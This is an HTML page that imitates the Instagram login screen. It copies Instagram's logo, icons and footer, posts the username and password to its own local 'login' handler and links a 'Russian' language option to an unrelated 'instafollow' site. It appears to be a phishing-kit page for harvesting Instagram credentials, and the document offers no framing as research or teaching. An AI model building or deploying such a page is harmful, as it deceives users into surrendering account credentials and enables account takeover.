<!DOCTYPE html>
<html>

<head>
    <title>Login • Instagram</title>
    <link data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yb/r/lswP1OF1o6P.png" rel="icon"
        sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v3/yb/r/lswP1OF1o6P.png">
    <meta charset="utf-8">
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="mobile-web-app-capable" content="yes">
    <meta id="viewport" name="viewport"
        content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2, viewport-fit=cover">
    <meta name="theme-color" content="#ffffff">
    <link rel="apple-touch-icon" sizes="76x76" href="https://static.cdninstagram.com/rsrc.php/v3/yR/r/lam-fZmwmvn.png">
    <link rel="apple-touch-icon" sizes="120x120"
        href="https://static.cdninstagram.com/rsrc.php/v3/ys/r/aM-g435MtEX.png">
    <link rel="apple-touch-icon" sizes="152x152"
        href="https://static.cdninstagram.com/rsrc.php/v3/yx/r/H1l_HHqi4p6.png">
    <link rel="apple-touch-icon" sizes="167x167"
        href="https://static.cdninstagram.com/rsrc.php/v3/yB/r/-7Z_RkdLJUX.png">
    <link rel="apple-touch-icon" sizes="180x180"
        href="https://static.cdninstagram.com/rsrc.php/v3/yG/r/De-Dwpd5CHc.png">
    <link data-default-icon="https://static.cdninstagram.com/rsrc.php/yv/r/BTPhT6yIYfq.ico" rel="shortcut icon"
        type="image/x-icon" href="https://static.cdninstagram.com/rsrc.php/yv/r/BTPhT6yIYfq.ico">

    <link rel="stylesheet" href="./public/asset/app.css">

</head>

<body>

    <body>
        <span id="root">
            <section class="section-all">

                <!-- 1-Role Main -->
                <main class="main" role="main">
                    <div class="wrapper">
                        <article class="article">
                            <div class="content">
                                <div class="login-box">
                                    <div class="header">
                                        <img class="logo"
                                            src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png"
                                            alt="Instagram">
                                    </div><!-- Header end -->
                                    <div class="form-wrap">
                                        <form class="form" method="post" action="login">

                                            <div class="input-box">
                                                <input type="text" id="name" aria-describedby=""
                                                    placeholder="Phone number, username, or email" aria-required="true"
                                                    maxlength="30" autocapitalize="off" autocorrect="off"
                                                    name="username" value="" required>
                                            </div>

                                            <div class="input-box">
                                                <input type="password" name="password" id="password"
                                                    placeholder="Password" aria-describedby="" maxlength="30"
                                                    aria-required="true" autocapitalize="off" autocorrect="off"
                                                    required>
                                            </div>

                                            <span class="button-box">
                                                <button class="btn" type="submit" name="login">Log in</button>
                                            </span>

                                            <a class="forgot" href="#">Forgot password?</a>
                                        </form>
                                    </div> <!-- Form-wrap end -->
                                </div> <!-- Login-box end -->

                                <div class="login-box">
                                    <p class="text">Don't have an account?<a href="#">Sign up</a></p>
                                </div> <!-- Signup-box end -->

                                <div class="app">
                                    <p>Get the app.</p>
                                    <div class="app-img">
                                        <a
                                            href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
                                            <img
                                                src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png">
                                        </a>
                                        <a
                                            href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
                                            <img
                                                src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png">
                                        </a>
                                    </div> <!-- App-img end-->
                                </div> <!-- App end -->
                            </div> <!-- Content end -->
                        </article>
                    </div> <!-- Wrapper end -->
                </main>

                <!-- 2-Role Footer -->
                <footer class="footer" role="contentinfo">
                    <div class="footer-container">

                        <nav class="footer-nav" role="navigation">
                            <ul>
                                <li><a href="">Meta</a></li>
                                <li><a href="">About</a></li>
                                <li><a href="">Blog</a></li>
                                <li><a href="">Jobs</a></li>
                                <li><a href="">Help</a></li>
                                <li><a href="">Api</a></li>
                                <li><a href="">Privacy</a></li>
                                <li><a href="">Terms</a></li>
                                <li><a href="">Top Applicants</a></li>
                                <li><a href="">Locations</a></li>
                                <li><a href="">Instagram Lite</a></li>
                                <li><a href="">Contact Uploading & Non-Users</a></li>
                                <li><a href="">Meta Verified</a></li>
                                <li>
                                    <span class="language">Language
                                        <select name="language" class="select" onchange="la(this.value)">
                                            <option value="#">English</option>
                                            <option value="http://ru-instafollow.bitballoon.com">Russian</option>
                                        </select>
                                    </span>
                                </li>
                            </ul>
                        </nav>

                        <span class="footer-logo">&copy; 2023 Instagram from Meta</span>
                    </div> <!-- Footer container end -->
                </footer>

            </section>
        </span> <!-- Root -->

        <!-- Select Link -->
        <script type="text/javascript">
            function la(src) {
                window.location = src;
            }
        </script>
        <script src="./public/asset/app.js"></script>

    </body>
</body>

</html>